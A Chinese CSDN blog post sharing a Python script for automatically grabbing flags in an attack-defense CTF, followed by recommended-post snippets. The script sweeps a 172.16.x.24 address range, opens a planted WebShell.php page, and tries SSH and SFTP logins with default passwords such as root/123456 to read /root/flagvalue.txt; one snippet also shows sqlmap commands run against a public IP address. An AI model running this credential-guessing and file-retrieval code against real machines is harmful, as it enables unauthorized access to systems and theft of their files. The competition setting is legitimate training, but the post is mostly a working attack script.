自动获取flag

最新推荐文章于 2024-04-28 20:33:33 发布
最新推荐文章于 2024-04-28 20:33:33 发布
阅读量1k 收藏 2
点赞数
文章标签: Python 安全 大赛 flag 扫描
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zheng_ruiguo/article/details/89467122
版权 
'''
scanFlag.py 自动获取flag by 郑瑞国
'''
import paramiko
import webbrowser
import threading
import time

def webConnect(ip):
    webbrowser.open('http://'+ip+'/html/WebShell.php')
    time.sleep(0.5)

def ftpConnect(ip,user,pwd):
    try:
        transport = paramiko.Transport((ip, 22))
        transport.connect(username=user,password=pwd)
        sftp = paramiko.SFTPClient.from_transport(transport)
        # 将remove_path 下载到本地 local_path
        sftp.get('/root/flagvalue.txt', 'flagvalue'+ip+'.txt')
        print(ip,'ftp get flag OK',user)
        transport.close()
        return 1
    except:
        print(ip,'ftp no connect',user)

def sshConnect(ip,user,pwd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=ip,port=22,username=user,password=pwd,timeout=1)
        flag = ssh.exec_command('cat /root/flagvalue.txt')[1].readlines()
        print(ip,'flag:')
        for line in flag:
            print(line)
        ssh.close()
        return 1
    except:
        print(ip,'ssh no connect',user)


def scanAll(firstNet,endNet,user1,pass1,user2,pass2):
    for net in range(firstNet,endNet):
        ip = '172.16.'+str(net)+'.24'
        #print(ip)
        threading._start_new_thread(webConnect,(ip,))
        time.sleep(0.5)
        threading._start_new_thread(sshConnect,(ip,user1,pass1))
        time.sleep(0.5)
        threading._start_new_thread(ftpConnect,(ip,user1,pass1))
        time.sleep(0.5)
        threading._start_new_thread(sshConnect,(ip,user2,pass2))
        time.sleep(0.5)
        threading._start_new_thread(ftpConnect,(ip,user2,pass2))
        time.sleep(0.5)

if __name__=='__main__':
    ##scanAll(firstNet,endNet,user1,pass1,user2,pass2)
    scanAll(101,109,'admin','123456','root','123456')

 

云空
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4444
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
AWD自动提交flag脚本
05-14
AWD自动提交flag脚本
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 347
第一种:利用input伪协议 ,获取到flag。第二种:利用flter协议,获取到flag。第三种:利用data 协议 获取到fag。
工业线上赛(2022省赛)
njh18790816639的博客
11-02 1066
发现存在upx壳通过工具发现无法脱upx壳(版本4.00),而通过ida分析发现需要通过upx3.96版本进行解压。然后分析加密流程:故我们进入B::cmp函数查看函数是如何进行比较的:(发现以索引为线索进行比较的。
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
awd比赛可用的自动获取flag脚本。.zip
09-30
awd比赛可用的自动获取flag脚本。
渗透实战-vulnhub-DC-3
qq_52263650的博客
04-07 301
渗透实战-vulnhub-DC-2
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 4782
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测,探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
通过python脚本集体获取CTF中的flag并且提交
lwj173920的博客
10-25 562
从网址 https://cloud.dasctf.com/375/competePage/530 可知 match_id=375。# ip为比赛中靶机的ip地址,res=后面的即为对应靶机的flag,在比赛平台找对应的靶机flag对话框提交即可。# 118.24.11.89 为比赛平台获取flag的Server地址。ip_list = ["集体所有队伍的IP地址"]print("正在获取靶机的flag:")# token中的10121为比赛平台自己的id。# 数组中为比赛平台中所有队伍的ip地址。
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
工具方法——根据flag获取对应的值
2551的博客
07-20 2713
根据flag获取对应的值 有时候我们在做数据存储的时候,会需要根据一个flag,然后转换为对应的中文存到数据库中,例如: String flag = "1,2,4"; String str = "1小轿车;2大卡车;3大巴车;4摩托车;5坦克;6皮卡车"; flag是我们后台接收到的值,数据库中需要存的是对应的中文。使用以下方法,就可以很方便地进行转化。 public String convert(String str, String flag) { // 0新保;1续保;2转保;3电销;
Dest0g3 520迎新赛 writeup by 树木
JEWSWS的博客
05-29 3564
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
GIF格式不依靠特定工具找出flag
cadandme的博客
02-27 1279
GIF格式不依靠特定工具找出flag 内容:今天做了道web题,跟大家分享一下解题方法。 打开后是一个gif,然后我就尝试用各种方式去看gif的内容,在用记事本打开后看到一大堆乱码的最后有这么一串字符串 #我发现跟asc解加密有关,但asc解加密还需要一个密码,而在gif显示出来有几个字母,符合密码条件。从而找出flag。 主要: 在这里主要分享:在不用特定软件的情况如何在一个gif里面找出我们需要的画面,我们可以打开gif然后右击,选择编辑并创建里面的视频制作。 进入后的画面如下,我们可以很轻松的找到
推荐一个SAM文件中flag含义解释工具--转载
weixin_33971205的博客
02-03 344
SAM是Sequence Alignment/Map 的缩写。像bwa等软件序列比对结果都会输出这样的文件。samtools网站上有专门的文档介绍SAM文件。具体地址:http://samtools.sourceforge.net/SAM1.pdf 很多人困惑SAM文件中的第二列FLAG值是什么意思。根据文档介绍我们可以计算,但是为了方便大家,下面给大家提供一个脚本工具,大家直接输入flag值就可...
Go命令行实现工具- flag大法详解
MClink的博客
12-04 1961
一、flag 是什么东西? 对于很多语言,都支持用命令行执行。 例如 PHP 支持用PHP命令 解析PHP脚本语言,Java 支持用 Java命令编译 Java代码,golang 也支持用 go 命令编译执行。 既然都支持用命令行执行,但是命令行又不像web 页面那样有输入框给我们填充参数,那么怎么让程序可以读取我们输入的值呢? 为了解决这样的问题,golang 为此提供了 flag 标准库。 它的主要功能是实现命令行参数的解析。 二、flag 入门? 我们简单举一个简单的例子: package main
查找图片中隐藏的flag
axywjij017440的博客
05-01 9374
比如我们现有图123.jgp,要对它进行分析,查找图片中隐藏的flag,首先要了解一些关于图片格式的知识,这里举例jpg格式的图片,其他格式图片自行google一下。 jpg图片格式知识:   jpg格式文件开始的2字节是图像开始SOI(Start of Image,SOI)为FF D8,之后2个字节是JFIF应用数据块APPO(JFIF application segment)为F...
sqlmap找flag
12-21
sqlmap是一个强大的自动化SQL注入工具,可以用于扫描、发现并利用SQL注入漏洞。如果你想使用sqlmap来找到flag,你可以按照以下步骤进行操作: 1. 首先,你需要获取目标网站的URL,例如:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值